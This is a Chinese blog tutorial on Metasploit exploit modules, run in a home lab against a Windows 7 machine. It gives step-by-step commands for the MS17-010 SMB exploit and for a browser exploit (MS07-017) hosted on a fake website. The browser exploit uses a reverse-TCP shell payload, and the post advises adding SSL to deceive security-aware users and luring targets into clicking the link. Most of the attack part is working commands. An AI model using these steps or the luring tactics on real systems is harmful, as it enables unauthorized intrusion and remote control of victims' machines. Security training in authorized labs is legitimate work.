【MSFconsole进阶】exploits(渗透攻击模块):Active Exploit(主动渗透攻击)、Passive Exploit(被动渗透攻击)

目录

exploits(渗透攻击模块)

一、简介:

二、Active Exploit(主动渗透攻击)

2.1、前提:

2.2、示例:

2.2.1、实验环境:

2.2.2、第一步:信息收集

2.2.3、第二步:测试目标是否在线

2.2.4、第三步:测试漏洞为ms17_010

2.2.5、第四步:进入到会话,执行

三、Passive Exploit(被动渗透攻击)

3.1、简介:

3.2、示例

3.2.1、实验环境:

3.2.2、第一步:装载模块

3.2.3、第二步:

3.2.4、第三步:诱使目标点击

3.2.5、第四步:进入会话



 

exploits(渗透攻击模块)

一、简介:

利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法

分为主动(Active Exploit)、被动(Passive Exploit)

确实挺多的

 



 

二、Active Exploit(主动渗透攻击)

2.1、前提:

发现服务--->寻找漏洞

目标开启了某种服务,并且这个服务存在漏洞

2.2、示例:

2.2.1、实验环境:

目标关闭防火墙

目标:Windows 7 旗舰版 Service Pack 1 。IP地址为192.168.190.138

攻击机:Kali 。IP地址为192.168.190.131


2.2.2、第一步:信息收集

使用nmap扫描目标主机看是否存在常见漏洞

db_nmap --script=vuln 192.168.190.138

结果

Risk factor: HIGH 

风险因素:高

A critical remote code execution vulnerability exists in Microsoft SMBv1

Microsoft SMBV1中存在关键的远程代码执行漏洞

servers (ms17-010)


2.2.3、第二步:测试目标是否在线

使用辅助模块auxiliary

# 装载具体模块

use auxiliary/scanner/discovery/arp_sweep

#可以查看相关命令

show options

# 设置模块(目标、速度)

set rhosts 192.168.190.138

# 设置线程

set threads 250

# 启动模块

run

如果扫不出来,就可能是有防火墙(我是提前关了防火墙的) 


2.2.4、第三步:测试漏洞为ms17_010

# 使用ms17的漏洞利用模块

use exploit/windows/smb/ms17_010_psexec

# 查看使用方法

show options

# 设置

set rhosts 192.168.190.138

# 执行漏洞攻击

run

Unable to find accessible named pipe!

无法找到可访问的命名管!

 Exploit completed, but no session was created.

漏洞利用完成,但未创建会话。

(如果创建成功再执行第四步)


2.2.5、第四步:进入到会话,执行

#可以查看已经创建的会话

session -l

#进入这个对应的shell

sessions -i ID

再执行自己想执行的命令



三、Passive Exploit(被动渗透攻击)

3.1、简介:

浏览器软件漏洞攻击和文件格式漏洞攻击,引诱目标用户打开触发。

#查看支持的渗透攻击模块

show exploits    

3.2、示例

3.2.1、实验环境:

目标开启防火墙

目标:Windows 7 旗舰版 Service Pack 1 。IP地址为192.168.190.138

攻击机:Kali 。IP地址为192.168.190.131

现在使用(主动攻击)Active进行攻击不会成功

使用(被动攻击)Passive,构造链接,诱使目标连接,利用浏览器的漏洞


3.2.2、第一步:装载模块

挂载模块

use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

show options
 


3.2.3、第二步:

伪造网站,诱使目标打开

SRVHOST可以指定为本机的IP地址,我们也可以打开SSL和设置SSL的证书,迷惑有安全意识的用户

URIPATH是访问的URL地址,可手动指定,比如192.168.190.131/service(一般默认根目录)


#设置

set SRVHOST 192.168.190.131

set PAYLOAD windows/shell/reverse_tcp

set LHOST 192.168.190.131

exploit


3.2.4、第三步:诱使目标点击

伪造了一个存在漏洞利用代码的WEB站点,这个站点等待浏览器版本存在漏洞的用户去访问它,将exploit注入到浏览器进程中,利用浏览器漏洞执行payload

我们在目标PC上用不同浏览器访问这个URL

访问以后,就会有记录,并尝试建立连接

没有后续就是可能没有相关已知的漏洞,一直处于等待阶段


3.2.5、第四步:进入会话

#可以查看已经创建的会话

session -l

#进入这个对应的shell

sessions -i ID

再执行自己想执行的命令

  • 5
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Kali是一个被广泛应用于渗透测试和网络安全的Linux发行版。而Metasploit Framework(MSF)是一个开源的渗透测试框架,它提供了一系列功能强大的工具和资源,帮助渗透测试人员实施攻击并评估系统的安全性。 在Kali中,可以使用Metasploit Framework来进行渗透测试,以测试目标系统的安全性。下面是进入MSF的步骤: 1. 打开终端:首先,在Kali Linux中打开一个终端窗口。你可以使用快捷键Ctrl+Alt+T来打开终端,或者在菜单中找到终端应用。 2. 启动MSF控制台:在终端中输入msfconsole并按下回车键,这将启动Metasploit Framework控制台。 3. 更新MSF:在控制台中,输入命令msfupdate并按下回车键,这将确保你使用的是最新的Metasploit Framework版本。 4. 选择攻击模块:通过输入命令use来选择你想要使用的攻击模块。例如,如果你想要使用一个特定的漏洞攻击模块,可以输入use exploit/[exploit_name]命令。 5. 设置攻击选项:根据选定的攻击模块,通过输入set命令来设置攻击选项。这些选项可能包括目标IP地址、端口等。 6. 运行攻击:通过输入命令exploit来运行已设置好的攻击。控制台将显示攻击的进展情况,并提供相关的反馈信息。 需要注意的是,在进行渗透测试时,务必遵循法律和道德规范,并且只能在授权范围内对系统进行测试。任何未经授权的攻击行为都是非法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值